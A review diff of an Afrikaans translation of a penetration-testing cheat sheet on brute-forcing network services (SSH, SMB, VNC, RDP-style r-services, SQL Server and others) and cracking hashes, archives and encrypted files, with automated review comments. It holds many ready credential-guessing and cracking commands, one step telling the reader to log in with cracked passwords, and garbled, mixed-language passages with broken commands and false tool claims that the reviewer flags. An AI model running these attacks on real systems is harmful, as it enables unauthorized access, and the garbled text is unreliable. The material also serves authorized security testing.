||||
Brute force is a technique used to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This method is often used as a last resort when other more sophisticated methods have failed. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the passwords are weak or easily guessable.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks, it is essential to use strong, complex passwords that are not easily guessable. Additionally, implementing account lockout policies after a certain number of failed login attempts can help prevent attackers from gaining access to the system. Using multi-factor authentication can also add an extra layer of security to protect against brute force attacks.
|
||||
```bash
|
||||
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
|
||||
```
|
||||
### Rlogin
|
||||
|
||||
Rlogin is 'n ongesekuriseerde remote login-protokol wat dikwels gebruik word vir aanvalle met 'n brute force-metode. Die aanvaller kan 'n groot aantal wagwoorde probeer totdat die regte een gevind word om toegang tot 'n stelsel te verkry.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used in hacking to gain unauthorized access to a system. It is important to note that brute force attacks can be time-consuming and resource-intensive, but they can be effective if the password is weak or easily guessable.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks, it is recommended to use strong and complex passwords, implement account lockout policies, and use multi-factor authentication. Additionally, monitoring login attempts and setting up intrusion detection systems can help detect and prevent brute force attacks.
|
||||
```bash
|
||||
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
|
||||
```
|
||||
### Rsh
|
||||
|
||||
Rsh (Remote Shell) is a simple remote shell client included with Unix operating systems. It can be used to execute commands on a remote system. Rsh is often targeted during brute force attacks due to its lack of encryption and authentication mechanisms. It is recommended to disable or uninstall Rsh if not needed to prevent unauthorized access to systems.
|
||||
#### Brute Force
|
||||
|
||||
Brute force is a straightforward attack method that tries all possible combinations of a password until the correct one is found. This method is time-consuming but effective, especially against weak passwords. Tools like Hydra and Medusa can automate the brute force process. It is essential to use this method responsibly and only on systems you own or have explicit permission to test.
|
||||
```bash
|
||||
hydra -L <Username_list> rsh://<Victim_IP> -v -V
|
||||
```
|
||||
|
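Review bot: The paragraphs under `### Rexec`, `### Rlogin` and `### Rsh` are English in a commit that translates this page to Afrikaans, while the Rlogin intro between them is Afrikaans, so the rendered page switches language inside one section. The three `#### Brute Force` paragraphs and the two `#### Mitigation` paragraphs repeat the same generic text almost word for word and say nothing specific to the r-services; translate them or drop them and keep the `hydra` lines. The Rlogin intro ("wat dikwels gebruik word vir aanvalle met 'n brute force-metode") describes how the protocol is abused rather than what rlogin is.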
@ -468,7 +503,9 @@ nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/va
|
|||
```
|
||||
### RTSP
|
||||
|
||||
RTSP (Real Time Streaming Protocol) is 'n netwerkbestuursprotokol wat gebruik word vir die stroom van kontinu streaming media soos video en klank.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against RTSP servers can be performed using tools like Hydra or Nmap. These tools can help automate the process of trying different username and password combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and resource-intensive, so they should be used with caution and only in scenarios where other methods have failed.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt <IP> rtsp
|
||||
```
|
||||
|
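Review bot: The `#### Brute Force` paragraph under `### RTSP` names Hydra and Nmap, but the fenced block it introduces holds only `hydra -l root -P passwords.txt <IP> rtsp`. Drop the Nmap mention or add the line it refers to. The paragraph is also English directly under an Afrikaans intro sentence.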
@ -480,9 +517,7 @@ legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --tar
|
|||
```
|
||||
### SNMP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against SNMP involve attempting to guess the community string used for authentication. This can be done using tools like `onesixtyone` or `snmpwalk`. The goal is to find a valid community string that allows read or write access to the SNMP agent.
|
||||
SNMP (Simple Network Management Protocol) is a protocol used for network management and monitoring. It operates on the application layer of the OSI model and is commonly used to gather information from network devices such as routers, switches, printers, and servers. SNMP uses a community string for authentication, which can be vulnerable to brute-force attacks.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/snmp/snmp_login
|
||||
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
|
||||
|
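Review bot: "SNMP uses a community string for authentication" in the SNMP paragraph holds for SNMPv1 and v2c only; SNMPv3 authenticates with user names and keys instead. Since the `snmp_login` and `snmp-brute` lines below target community strings, say "SNMPv1/v2c" in that sentence. The paragraph is also English in the Afrikaans translation, and the sentence about `onesixtyone` and `snmpwalk` elsewhere in this hunk is the only place those tools are named, so check that the version kept still matches the commands.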
@ -491,7 +526,9 @@ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt ta
|
|||
```
|
||||
### SMB
|
||||
|
||||
### SMB
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to systems and accounts. It is important to use strong and unique passwords to protect against brute force attacks.
|
||||
```bash
|
||||
nmap --script smb-brute -p 445 <IP>
|
||||
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
|
||||
|
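Review bot: `### SMB` shows up twice in this hunk with only a blank line between the two. If both survive in the file, the page gets a duplicate heading and a duplicate anchor; please confirm the result has one. The paragraph under `#### Brute Force` is generic English text that does not mention SMB at all.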
@ -499,13 +536,7 @@ legba smb --target share.company.com --username admin --password data/passwords.
|
|||
```
|
||||
### SMTP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against SMTP servers involve attempting to guess valid usernames and passwords by systematically trying all possible combinations. This is typically achieved using automated tools that can rapidly try different combinations until the correct one is found.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To protect against brute force attacks on SMTP servers, it is essential to implement strong password policies, such as requiring complex passwords and enforcing account lockout policies after a certain number of failed login attempts. Additionally, implementing rate limiting on login attempts can help prevent automated tools from successfully brute forcing credentials.
|
||||
SMTP (Simple Mail Transfer Protocol) is 'n protokol wat gebruik word vir die stuur van e-posse oor 'n netwerk.
|
||||
```bash
|
||||
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
|
||||
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
|
||||
|
@ -513,14 +544,24 @@ legba smtp --username admin@example.com --password wordlists/passwords.txt --tar
|
|||
```
|
||||
### SOCKS
|
||||
|
||||
SOCKS is a protocol that routes network packets between a client and a server through a proxy server. It can be used in brute force attacks to hide the attacker's IP address and location.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is often used when other techniques, such as dictionary attacks, fail to crack a password. Brute force attacks can be time-consuming but are effective against weak passwords. It is important to note that using brute force attacks against a system without permission is illegal and unethical.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van 'n wagwoord te probeer totdat die regte een gevind word. Hierdie metode word dikwels gebruik wanneer ander tegnieke, soos woordeboekaanvalle, nie slaag om 'n wagwoord te kraak nie. Brute force-aanvalle kan tydrowend wees, maar is effektief teen swak wagwoorde. Dit is belangrik om daarop te let dat die gebruik van brute force-aanvalle teen 'n stelsel sonder toestemming onwettig en oneties is.
|
||||
```bash
|
||||
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
|
||||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
|
||||
# With alternative address
|
||||
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
|
||||
```
|
||||
### SQL-bediener
|
||||
### SQL Server
|
||||
|
||||
Brute-force attacks against SQL Server can be performed using various tools such as Hydra, Ncrack, and Metasploit. These tools allow attackers to systematically check a large number of passwords until the correct one is found. It is important to use strong and complex passwords to protect SQL Server databases from brute-force attacks.
|
||||
```bash
|
||||
#Use the NetBIOS name of the machine as domain
|
||||
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
||||
|
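Review bot: The SOCKS section now contains the English `#### Brute Force` paragraph, then a literal `#### Afrikaans Translation` heading, then a second `#### Brute Force` heading with the Afrikaans version of the same paragraph. That is translation-tool output pasted into the page; keep one heading and one paragraph in the target language and delete the `#### Afrikaans Translation` line. The SOCKS intro is also off topic for the commands that follow: it talks about using a proxy to hide the attacker's address, while `socks-brute` and `legba socks5` test the proxy's own credentials. `### SQL-bediener` and `### SQL Server` both appear as well, so confirm only one heading remains.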
@ -533,7 +574,7 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used to gain unauthorized access to SSH servers. Attackers use automated tools to systematically try different passwords until they find the right one. To protect against brute force attacks, it is essential to use strong, complex passwords and implement security measures such as account lockouts after multiple failed login attempts.
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective if the credentials are weak. It is important to use strong, unique passwords and implement account lockout policies to prevent brute force attacks.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||||
|
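Review bot: Under the SSH `#### Brute Force` heading this hunk swaps one English paragraph for another English paragraph, which is a rewrite, not a translation. The second variant also drops the only SSH-specific wording ("unauthorized access to SSH servers") and reads the same as the SMB paragraph earlier in the commit. Either translate the original paragraph or leave the line untouched.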
@ -545,17 +586,17 @@ legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --targ
|
|||
```
|
||||
#### Swakke SSH-sleutels / Debian voorspelbare PRNG
|
||||
|
||||
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n dramaties verminderde sleutelruimte wat met gereedskap soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||||
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n aansienlik verminderde sleutelruimte wat met gereedskap soos [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
|
||||
|
||||
### STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ)
|
||||
|
||||
Die STOMP-teksprotokol is 'n wyd gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskie-opeenhopingsdiens** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapoperasies uit te voer.
|
||||
Die STOMP-teksprotokol is 'n wyd gebruikte boodskapprotokol wat **naadlose kommunikasie en interaksie met gewilde boodskie-opeenhopingsdiens** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapbedrywighede uit te voer.
|
||||
```bash
|
||||
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
|
||||
```
|
||||
### Telnet
|
||||
|
||||
Telnet is 'n netwerkprotokol wat gebruik word om 'n verbindingsessie met 'n ander rekenaar te skep. Dit kan gebruik word vir die uitvoering van brute force-aanvalle deur verskeie aanmeldingskombinasies te probeer totdat die regte een gevind word.
|
||||
Telnet is 'n onveilige protokol wat gebruik kan word om te kommunikeer met 'n bediener deur middel van 'n opdraglyn. Dit kan gebruik word vir brute force-aanvalle deur verskeie aanmeldingspogings te probeer totdat die regte wagwoord gevind word.
|
||||
```bash
|
||||
hydra -l root -P passwords.txt [-t 32] <IP> telnet
|
||||
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
|
||||
|
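Review bot: Most of this hunk is synonym churn with no change in meaning: "dramaties" becomes "aansienlik" in the weak-SSH-key paragraph, "boodskapoperasies" becomes "boodskapbedrywighede" in the STOMP paragraph, and the Telnet intro is reworded end to end. That makes every re-run of the translation produce a diff that has to be reviewed for nothing. Re-translate only the segments whose source text changed. While touching the STOMP line, "boodskie-opeenhopingsdiens" is carried over unchanged and still does not read as "message queueing services".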
@ -572,14 +613,16 @@ legba telnet \
|
|||
```
|
||||
### VNC
|
||||
|
||||
VNC, of Virtual Network Computing, is a graphical desktop sharing system that allows you to remotely control another computer. VNC is often used in penetration testing to gain access to a target system. One common method is to perform a brute force attack on the VNC password to gain unauthorized access.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against VNC servers are common due to the protocol's lack of built-in security features. Attackers can use tools like Hydra or Medusa to automate the process of trying different username and password combinations until the correct one is found. It is essential to use strong, unique credentials and consider additional security measures such as IP whitelisting or VPNs to protect VNC servers from brute force attacks.
|
||||
```bash
|
||||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
|
||||
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
|
||||
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
|
||||
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
|
||||
use auxiliary/scanner/vnc/vnc_login
|
||||
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
|
||||
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt <IP>
|
||||
legba vnc --target localhost:5901 --password data/passwords.txt
|
||||
|
||||
#Metasploit
|
||||
|
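Review bot: Several command lines in the VNC block are not usable as written. The `hydra`, `medusa` and `patator` lines carry en-dashes instead of ASCII hyphens (`–P`, `–u`, `–M`, `–t`, `–x`), the `ncrack` target is garbled as `<IP>:>POR>T` where `<IP>:<PORT>` is meant, and `fgep` in the `patator` line should be `fgrep`. The block also contains `nmap -sV --script pgsql-brute ... -p 5432 <IP>`, which is a PostgreSQL check and does not belong under `### VNC`. A translation commit should leave fenced code byte-identical to the source, so please diff the block against the English page.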
@ -594,8 +637,8 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en outomatiseer met die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Toegang Vandag:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
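Review bot: "Kry Vandaag Toegang:" uses the Dutch spelling; the Afrikaans word is "vandag", which the other variant in this same hunk ("Kry Toegang Vandag:") already has. Keep "vandag".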
@ -650,7 +693,7 @@ unzip unlocked.zip #User new_pwd as password
|
|||
```
|
||||
### 7z
|
||||
|
||||
Brute-forcing a password-protected 7z file can be achieved using tools like `7z2hashcat` or `hashcat`. These tools can convert the 7z file's password hash into a format that can be cracked using brute-force techniques.
|
||||
Brute-force attacks against encrypted 7z files can be time-consuming and resource-intensive. Tools like 7z2hashcat can convert 7z files to hashcat formats for easier cracking. Additionally, using a powerful GPU can significantly speed up the brute-force process.
|
||||
```bash
|
||||
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
|
||||
```
|
||||
|
@ -663,7 +706,7 @@ apt-get install libcompress-raw-lzma-perl
|
|||
```
|
||||
### PDF
|
||||
|
||||
Brute-force attacks are commonly used to crack passwords from PDF files. Tools like `pdfcrack` and `hashcat` can be used to perform brute-force attacks on encrypted PDF files. These tools work by trying all possible combinations of characters until the correct password is found. It is important to note that brute-force attacks can be time-consuming and resource-intensive, especially for complex passwords.
|
||||
Brute-force attacks are commonly used to crack passwords from PDF files. Tools like `pdfcrack` and `pdf2john` can be used to extract the hash from a PDF file, which can then be cracked using tools like `John the Ripper` or `hashcat`. These tools use brute-force techniques to try all possible combinations of characters until the correct password is found. It is important to use strong and complex passwords to protect PDF files from brute-force attacks.
|
||||
```bash
|
||||
apt-get install pdfcrack
|
||||
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
|
||||
|
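Review bot: The PDF paragraph that says "`pdfcrack` and `pdf2john` can be used to extract the hash" is wrong about `pdfcrack`: it attacks the PDF directly, which is exactly what the `pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt` line below it does. Only `pdf2john` extracts a hash for John the Ripper or hashcat. Both paragraph variants in this hunk are English, so the change is a rewrite that introduces an error rather than a translation.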
@ -728,9 +771,9 @@ cryptsetup luksOpen backup.img mylucksopen
|
|||
ls /dev/mapper/ #You should find here the image mylucksopen
|
||||
mount /dev/mapper/mylucksopen /mnt
|
||||
```
|
||||
'n Ander Luks BF handleiding: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||||
|
||||
### Mysql
|
||||
|
||||
'n Ander Luks BF-handleiding: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
|
||||
```bash
|
||||
#John hash format
|
||||
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
|
||||
|
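Review bot: As rendered, the "'n Ander Luks BF-handleiding" link now comes after the `### Mysql` heading and directly above the MySQL `#John hash format` block, so the LUKS tutorial reads as part of the MySQL section. Move the line back above `### Mysql`, at the end of the LUKS section where the earlier variant sits.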
@ -745,9 +788,9 @@ john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
|
|||
|
||||
<figure><img src="../.gitbook/assets/image (660).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### DPAPI Meestersleutel
|
||||
### DPAPI Meester Sleutel
|
||||
|
||||
Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en hardloop dan john
|
||||
Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en dan john
|
||||
|
||||
### Open Office Wagwoord Beskermde Kolom
|
||||
|
||||
|
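Review bot: Changing the heading from `### DPAPI Meestersleutel` to `### DPAPI Meester Sleutel` changes the generated anchor, which breaks any existing link to the section, and Afrikaans writes this compound as one word, so the earlier form was the correct one. Keep the heading as it was. In the sentence below it, "en dan john" drops the verb; say explicitly that john is run on the output of `DPAPImk2john.py`.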
@ -773,7 +816,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) om maklik en **outomatiseer werkstrome** te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) om maklik **werkstrome te bou** en te **outomatiseer** met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
@ -875,51 +918,64 @@ hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
|
|||
```bash
|
||||
hashcat --example-hashes | grep -B1 -A2 "NTLM"
|
||||
```
|
||||
### Brute Forcing Linux Hashes - /etc/shadow lêer
|
||||
### Brute Force
|
||||
|
||||
Brute forcing is 'n aanvalstegniek wat gebruik word om wagtwoorde te agterhaal deur verskeie kombinasies van moontlike wagtwoorde te probeer. Vir Linux-stelsels kan die /etc/shadow-lêer 'n bron wees van gehashde wagtwoorde wat aangeval kan word deur 'n brute force-aanval uit te voer. Met die regte gereedskap en tegnieke kan 'n aanvaller poog om hierdie gehashde wagtwoorde te ontsyfer en toegang tot die stelsel te verkry.
|
||||
Brute force attacks involve trying all possible combinations of characters until the correct password is found. This method is commonly used to crack Linux password hashes stored in the `/etc/shadow` file.
|
||||
|
||||
### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van karakters te probeer totdat die regte wagwoord gevind word. Hierdie metode word dikwels gebruik om Linux-wagwoordhasies wat in die `/etc/shadow`-lêer gestoor word, te kraak.
|
||||
```
|
||||
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
|
||||
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
|
||||
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
|
||||
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
|
||||
```
|
||||
### Brute-Force Attack
|
||||
### Brute-Force
|
||||
|
||||
#### Description
|
||||
|
||||
A brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found.
|
||||
Brute-force attacks are a common method used to crack passwords. This technique involves trying all possible combinations of characters until the correct password is found. Brute-force attacks can be time-consuming but are often successful, especially with the use of powerful computers or specialized software.
|
||||
|
||||
#### Tools
|
||||
|
||||
- **John the Ripper**: A popular password-cracking tool that can perform brute-force attacks.
|
||||
- **Hashcat**: Another powerful password-cracking tool that supports various algorithms and attack types.
|
||||
There are several tools available for conducting brute-force attacks on Windows hashes. Some popular tools include:
|
||||
|
||||
#### Techniques
|
||||
- **John the Ripper**: A powerful password-cracking tool that can be used for various types of hashes, including Windows hashes.
|
||||
- **Hashcat**: Another popular tool for password cracking that supports a wide range of hash types, including Windows hashes.
|
||||
- **Hydra**: A versatile password-cracking tool that supports multiple protocols, including SMB, which can be used to crack Windows hashes.
|
||||
|
||||
1. **Dictionary Attack**: Involves using a predefined list of words to crack passwords.
|
||||
2. **Mask Attack**: Allows for more complex password variations by defining a mask with placeholders for characters.
|
||||
3. **Hybrid Attack**: Combines dictionary words with brute-force techniques to increase the chances of success.
|
||||
#### Methodology
|
||||
|
||||
When conducting a brute-force attack on Windows hashes, it is essential to use a good wordlist that includes common passwords, as well as variations and combinations of words. Additionally, utilizing rulesets can help increase the efficiency of the attack by applying specific transformations to the words in the wordlist.
|
||||
|
||||
#### Resources
|
||||
|
||||
- [John the Ripper GitHub Repository](https://github.com/magnumripper/JohnTheRipper)
|
||||
- [Hashcat GitHub Repository](https://github.com/hashcat/hashcat)
|
||||
- [John the Ripper](https://www.openwall.com/john/)
|
||||
- [Hashcat](https://hashcat.net/hashcat/)
|
||||
- [Hydra](https://github.com/vanhauser-thc/thc-hydra)
|
||||
```
|
||||
3000 | LM | Operating-Systems
|
||||
1000 | NTLM | Operating-Systems
|
||||
```
|
||||
### Brute Force
|
||||
### Brute-Force
|
||||
|
||||
Brute force is a common method used to crack hashes. It involves trying all possible combinations of characters until the correct one is found. This method is time-consuming but can be effective, especially for simpler passwords. There are tools available that can automate the brute force process, such as John the Ripper and Hashcat.
|
||||
Brute-force attacks involve trying all possible combinations of characters until the correct one is found. This method is commonly used to crack common application hashes, such as MD5 or SHA-1.
|
||||
|
||||
### Dictionary Attacks
|
||||
#### Tools and Resources
|
||||
|
||||
Dictionary attacks involve using a list of commonly used passwords or words from a dictionary to try to crack hashes. This method is more efficient than brute force as it focuses on likely passwords first. Tools like Hashcat and Hydra can be used to perform dictionary attacks.
|
||||
- **Hashcat**: A popular password cracking tool that supports multiple hashing algorithms.
|
||||
- **John the Ripper**: Another widely used password cracking tool that can perform brute-force attacks.
|
||||
- **CrackStation**: An online database containing pre-computed hash values for common passwords, which can help in cracking hashes more quickly.
|
||||
|
||||
### Rainbow Tables
|
||||
#### Methodology
|
||||
|
||||
Rainbow tables are precomputed tables used to crack hashes quickly. They contain a list of hashes and their corresponding plaintext passwords. By comparing the hash to the values in the rainbow table, the plaintext password can be quickly identified. Tools like RainbowCrack can be used to leverage rainbow tables in password cracking.
|
||||
1. Obtain the hash value of the target application.
|
||||
2. Choose a password cracking tool like Hashcat or John the Ripper.
|
||||
3. Configure the tool to use the appropriate hashing algorithm (e.g., MD5, SHA-1).
|
||||
4. Start the brute-force attack by specifying the character set and length of the password.
|
||||
5. Monitor the progress of the attack and wait for the tool to find the correct password.
|
||||
6. Once the password is found, use it to access the application or system.
|
||||
|
||||
By following this methodology, hackers can effectively crack common application hashes using brute-force techniques.
|
||||
```
|
||||
900 | MD4 | Raw Hash
|
||||
0 | MD5 | Raw Hash
|
||||
|
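Review bot: Nearly every heading in this hunk is a variant of `### Brute Force` or `### Brute-Force`, so the outline no longer says which hashcat mode table belongs to which hash family. Only `### Brute Forcing Linux Hashes - /etc/shadow lêer` names its table (md5crypt, bcrypt, sha256crypt, sha512crypt); the LM/NTLM table and the raw MD4/MD5 table need equally specific headings. The Tools list claims Hydra "can be used to crack Windows hashes", which is incorrect: Hydra guesses credentials against live network services and does not process hashes, so remove that bullet. The `/etc/shadow` paragraph appears in English and again in Afrikaans under a second `### Brute Force` heading; keep one. The `#### Methodology` list ends with "Once the password is found, use it to access the application or system" and a closing sentence about what "hackers can effectively" do, neither of which is reference material for the mode table that follows.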
@ -935,18 +991,18 @@ Rainbow tables are precomputed tables used to crack hashes quickly. They contain
|
|||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kontroleer die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome te bou en outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandaag Toegang:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **werkstrome outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry Vandag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
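Review bot: "om maklik te bou en **werkstrome outomatiseer**" no longer parses as a sentence, because the object "werkstrome" has been moved away from "bou". This is also the third different Afrikaans rendering of the same Trickest banner in this commit, with "Kry Vandag Toegang:" here against "Kry Vandaag Toegang:" in the earlier banner hunk. Translate the banner once and reuse the same string in all three places. The support list above it shows the same drift between "Die PEASS-familie" and "Die PEASS Familie" and between "haktruuks" and "hacking-truuks".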